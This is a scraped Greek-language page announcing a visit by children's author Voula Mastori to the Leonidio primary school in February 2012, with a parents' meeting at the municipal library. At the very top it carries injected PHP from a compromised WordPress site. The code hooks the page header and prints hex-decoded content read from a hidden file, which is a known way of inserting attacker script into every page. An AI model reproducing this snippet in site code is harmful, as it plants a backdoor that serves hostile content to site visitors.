if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Παιδική Λογοτεχνία με την Βούλα Μάστορη |

Παιδική Λογοτεχνία με την Βούλα Μάστορη

IMG_2857.JPG Το Δημοτικό Σχολείο Λεωνιδίου φιλοξενεί στα πλαίσια του προγράμματος “Φιλαναγνωσίας” την κα Βούλα Μάστορη.

Τα παιδιά του Δημοτικού Σχολείου, στις 28-29/02/2012, θα έχουν την ευκαιρία να συνδιαλεχθούν με την συγγραφέα πολλών παιδικών βιβλίων που έχουν διαβάσει.

Παράλληλα στις 28/02/2012 στις 18:30 στην Δημοτική Βιβλιοθήκη θα πραγματοποιηθεί συνάντηση με τους γονείς των μαθητών.

Η εκδήλωση γίνεται με την ενεργή συμμετοχή του Συλλόγου Γονέων και Κηδεμόνων του Δημοτικού Σχολείου Λεωνιδίου.

Λέξεις Κλειδιά σε αναζητήσεις: